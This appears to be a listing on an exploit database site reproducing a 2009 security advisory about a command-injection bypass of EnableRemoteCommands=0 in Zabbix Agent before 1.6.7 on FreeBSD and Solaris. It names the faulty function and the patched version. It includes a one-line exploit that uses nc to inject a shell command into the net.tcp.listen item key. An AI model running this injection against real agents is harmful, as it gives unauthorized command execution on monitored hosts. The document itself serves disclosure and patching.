[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Zabbix Agent < 1.6.7 Remote Bypass Vulnerability

Author
Nicob
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10245
Category
web applications
Date add
14-12-2009
Platform
unsorted
================================================
Zabbix Agent < 1.6.7 Remote Bypass Vulnerability
================================================

Zabbix Agent : Bypass of EnableRemoteCommands=0 From: Nicob <nicob () nicob net>
Date: Sun, 13 Dec 2009 16:28:30 +0100
 
From Wikipedia : "Zabbix is a network management system application
 
[...] designed to monitor and track the status of various network
services, servers, and other network hardware."
 
[Zabbix Agent : Bypass of EnableRemoteCommands=0]
 
Impacted software : Zabbix Agent (FreeBSD and Solaris only)
Zabbix reference : https://support.zabbix.com/browse/ZBX-1032
Patched version : 1.6.7
 
Faulty source code : function NET_TCP_LISTEN() in
libs/zbxsysinfo/(freebsd|solaris)/net.c
 
Exploit : $> echo "net.tcp.listen[80';id;echo ']"|nc -vn xxxxx 10050
Limitation : attacker must come from (or spoof) a trusted IP address
 
Changelog entry : fixed security vulnerability in processing of
net.tcp.listen under FreeBSD and Solaris agents



#  0day.today [2024-07-02]  #